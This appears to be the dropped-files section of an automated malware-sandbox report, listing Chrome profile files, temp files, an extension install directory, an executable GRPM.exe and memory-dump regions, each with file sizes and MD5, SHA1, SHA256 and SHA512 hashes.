C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1592899aae551f783d8050149086214b

SHA1
6ffe2ce576e037e2c0d1fd6d5f01b8799edd57f6

SHA256
849a1d23f21f7ed63ee4f9eb27d8ac3e7be5f20dc173219e3d08d402fd962151

SHA512
cd116258e5b51236352d216ff11c1c61b1249f52e2a08adf54910bb54dcc1ffa86e9ed0ed169e26b1e074f8975a6b01ed8dd6217055b31a7431c435be5b6651f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
905b0bf9a153f86fdf2ae1d5ac0824ce

SHA1
f8ef1c50a0b3e01b485e02bd782f304d1d7a2fe1

SHA256
e3c28ce2a899e1bc112f734a251373d4a166437b23212765d760283035698207

SHA512
ac7991fe842ceebcae8ff74ca0797b567f56056e09ae8cc97401655f8ec260ee1f9983aa7455fa46813ead4113e08faa026eb3d4176dcbe69e63faa2948b04d5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
72aeb665285af0f38fd5b1fbaab7869b

SHA1
756d1b35cfbba0b4d73a9f6929175fc165bd908a

SHA256
e777ab34af1f7290cf0bf84520630378db9d714d3efd6ed4fb39151f1bdeee37

SHA512
308f29a013972187b5fc2e583d8c93ff4d7e7aebcf7e5569cff9f4d3c3ddcbc6b20571954f035308dd5092d624d4d0d51da8cd6506414602b5bc0d664e920f58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a5df6957dddb96722a68e9659dc9b2ee

SHA1
75ce1ec61e3a963a119851381bde49fc6d6a64bb

SHA256
9dd02ed820a0283b047686b5da815ac31017daa19674d7164df5f6d4e66b6bf5

SHA512
16eb8a6649cab0f1d451e915fcf98857a2f723f2cac4c475071e8cb6dc7dfb98fa1b009c87858fee033cd0a566f292347eb212d4c9d3e6a1b0c9924d11c0baf3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
fe88a252f06f0d75d2766098c382800f

SHA1
69ec140c20283cb5cef5c01f1f9c6bc2d858281b

SHA256
5cec8a420f10934402daaed65b91097308046337b647deb2561e587b3c7d7063

SHA512
57c2a84ae9f5fc96482d196e52d482a129abe2e7dc1cd43e41cbf95b46ed336e973c1ac3bd1bdf641bd3d8a771b05c07fb12d488cf0f408907dc66b7cfd384fb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ad39e86a70696856a87c4ec1ce7a5cf9

SHA1
e20149b451a4d70ed207b9373b92c653aa96cee6

SHA256
1c765db6c1d8d18218ee0a87a51d61f3c4321268c0334b98a2bf51b155eb0cca

SHA512
b933d4806236fb618571654fdd94bdf5f3506d303b3fc3bdce29bde6ec6952e4452231cc2a62e2ac31f5d3a3108401a8e5a04b1b1efc5d73287a70e7902e1cd8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
dbaf9de33a635c70bab3d484084665b6

SHA1
2e189dca7c786b8f7b08d11adecdfe0991c74c8f

SHA256
ea7475b23f03a5eb24cdd5c2cab612124b87b70b48f02adb442a857cd8cb00a7

SHA512
654cf5761e9b0f3fcc05e17c7920fc04cb81f4daf1614b0c46aabb9c39d5f4e88119055a0da6c3db2fa812841875e075ad4b2f522ab3e83524dbd6e25b059f60

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a78ef6822764c669122e96c8e2dfdc61

SHA1
879493fa40b0ee75ec99b1f8a67f59b2359249a5

SHA256
fc965fcc364748f52d1b18b6acdb9e6dda53fb03e9fac933fa4259fbab265b5e

SHA512
e5569c0d49de53f84c37a6f13867850258dd490c52b218612811d903bac3b79948cdaf31f8718aad10de25530d81a4706c243aa403145e0fb28c4f25a74cbf1d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
b562261bdd752a82e4c0cb017e84a224

SHA1
338e96450016a54ad98f7ee72ac284cf341a75e5

SHA256
3e97d586d727091a0a531bb7223bbe30e2a10063bf14e8c4ec74ff2d18b333e7

SHA512
e442ff2cdc1272c02087c30bdd32c8b28abd4da46346e330dcc0d2172f27525dc8727ba40c62d5b5a373f1812187695cfab7bc4698ddb061ebaa2b2cfa14b1eb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
0f443f8abc18a2555a0617c435163ca9

SHA1
dbbebc0b125e1567fe7c24a094fa1f23d756be0d

SHA256
40527fd8b6e02be78adda2b94e7bb350a8b02e292c4d262269507a00cce43bbd

SHA512
7e6f34332fa6d6cbec3749d9493728f1b24d071149b44656cc0da468ca00804aaa1ef6d87ba5968e2ceb7865d512bdc6be3cfb9fd1987619562ece7de5e32446

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
3fa98d817cbbe28deb87222b7f2f1007

SHA1
5f92cf39bcba752e669fcfc0feb340f1e0efbabb

SHA256
22a4d846b154970dacb0affceaad7be531b0975a69f237aca90ab29b02ad136b

SHA512
ca515f068a2423b85071d6ff6706e49fd4ba389f652ddd2436425693d992a88040d374c2da70ec7881d8bedcd0c57d8a0e275a1e4b33b74dd5f3a486ea858ab3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
231KB

MD5
4a38050fac188bcd049ae683ae116e76

SHA1
e8381bb381c215cc388b46e24135886655b41488

SHA256
bd4666389fe7b3f2ae8a41de2589d3acc60f95f5d2f447c41b6b768ac638b052

SHA512
08a7faf8bb522a0a361df31a1759cfec89fd8baf646b5c1b1bc250721f82f82ccee35e0e59abb1c04f4e2c4ca724c8e80b71dd8e8ef568ae59d4557600ed6bf2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
231KB

MD5
44a7b38244c418b8a7a75c15177092eb

SHA1
a8baee3c286bb3ac6d81d2f64d88487d5d65d2b1

SHA256
94b19487200b293f3b683e66d243db9d33725347f5f21b4e6e48cd0bc92048fe

SHA512
ffbf4a30de0ed4eedf44efbb68fc85ff2e0c1d8c49fa93f491d244049d5f43de45289278b7ee80eb71dfa28db6ac987115413fd7dab03573199d094f60d79bb2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
231KB

MD5
6728a4c6dc5ba4081197402fcf701e01

SHA1
d7de9bafc32ab6ca9fb95cc9e62d65cdb4eda760

SHA256
67cd587a466e83256eb452e7d16fbd24e7a016e2e78da84999ee8d664a094e02

SHA512
76d1cdd957b1d1d0467bcbd3a421797df486fcccac33dd849d807b7d888a3931adc76216968d5839439e2c7a784ba9d683a0502858d04d6ab58baaff79deb0e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vquscngs.23s.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ee79114b

Filesize
1.2MB

MD5
ca92a270fec911e973ddf009ab6079f5

SHA1
cdc5efa6e016719e723e788f9580e46e18cdf437

SHA256
9538a3e7150fb75fadf1f29c4d60faafd97e7294ff4567d48594db9d2a0e08c3

SHA512
8418a21232c977a84cb0d52ef52f676c86ece8f481dc27b5d2c6844ca8914923a16e399f7b01757f94ade4aad5fad9a526e4649192f485fe42567a343c533451

Download Submit
C:\Users\Admin\AppData\Local\Temp\f4b2965e

Filesize
1.0MB

MD5
e5c5aa29bef4c87e4a760eb9a66a1980

SHA1
08e0f7407aa514b2b2c1b641e516a0107d0c6704

SHA256
24f3f9276cd27a0c706d82df189a9e0661ae66401fe59cc6b4d555224f55ee97

SHA512
6fd8a521786dca5c89874501c0a24f205ebb01d3477cf1621d8248078e53acb7b24f8f3b2826233adc7a4c32cbe6b824d9f023895603024c41e000a8af1b57d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir4972_648838718\CRX_INSTALL\_locales\en_CA\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir4972_648838718\e56ce33f-b377-4cf8-864c-7d77c05de39f.tmp

Filesize
132KB

MD5
da75bb05d10acc967eecaac040d3d733

SHA1
95c08e067df713af8992db113f7e9aec84f17181

SHA256
33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2

SHA512
56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef

Download Submit
C:\Users\Admin\AppData\Roaming\Install_4278\GRPM.exe

Filesize
2.8MB

MD5
8959b0abde3f940deeb48690572b4795

SHA1
66215c512fe42ec7df913e03f003225b9d538f1a

SHA256
0692914e647c9b64d85a160eb3bbfc98fff47b421671c36b609f87738a8aaa73

SHA512
97b9ed0235d12719a463d20b5fa06cd58ebb26e9a476b1de34d13d43223cf26d40cec65cc6b4b39904ba2e55d4f94fabebd465dd8251b4d4eb224584215a1281

Download Submit
C:\Users\Admin\Downloads\replace.txt

Filesize
630B

MD5
58a5a1d8cbf257d3ae55143b52e4de0b

SHA1
69672a7ac7eed6ab238cddb18a9bdb042ee023bd

SHA256
a290e08cd18f4c711f4e2208d32c05cce609493d714816b36dc35c68134ffb1d

SHA512
ff25555d7ef0ed0ecf9d842542539e1f7ffad13f26309f0824094a93f62a284ce1a0b3a409a688bdc355b4331fef40b0bd7e132b37f362ce4df49ba79b587d27

Download Submit
memory/1248-530-0x00007FFE41AD0000-0x00007FFE41CC5000-memory.dmp

Filesize
2.0MB

Download
memory/1248-558-0x0000000000CC0000-0x0000000000D20000-memory.dmp

Filesize
384KB

Download
memory/1248-559-0x0000000000880000-0x0000000000892000-memory.dmp

Filesize
72KB

Download
memory/2656-522-0x00000000754A0000-0x000000007561B000-memory.dmp

Filesize
1.5MB

Download
memory/2656-516-0x00007FFE41AD0000-0x00007FFE41CC5000-memory.dmp

Filesize
2.0MB

Download
memory/2744-484-0x00007FF61B720000-0x00007FF61B9E7000-memory.dmp

Filesize
2.8MB

Download
memory/2744-492-0x00007FFE23C10000-0x00007FFE23D82000-memory.dmp

Filesize
1.4MB

Download
memory/2744-513-0x00007FFE23C10000-0x00007FFE23D82000-memory.dmp

Filesize
1.4MB

Download
memory/2988-459-0x000001CB7CB90000-0x000001CB7CBB2000-memory.dmp

Filesize
136KB

Download
memory/2988-467-0x000001CB7CD20000-0x000001CB7CD2A000-memory.dmp

Filesize
40KB

Download
memory/2988-468-0x000001CB7CD50000-0x000001CB7CD62000-memory.dmp

Filesize
72KB

Download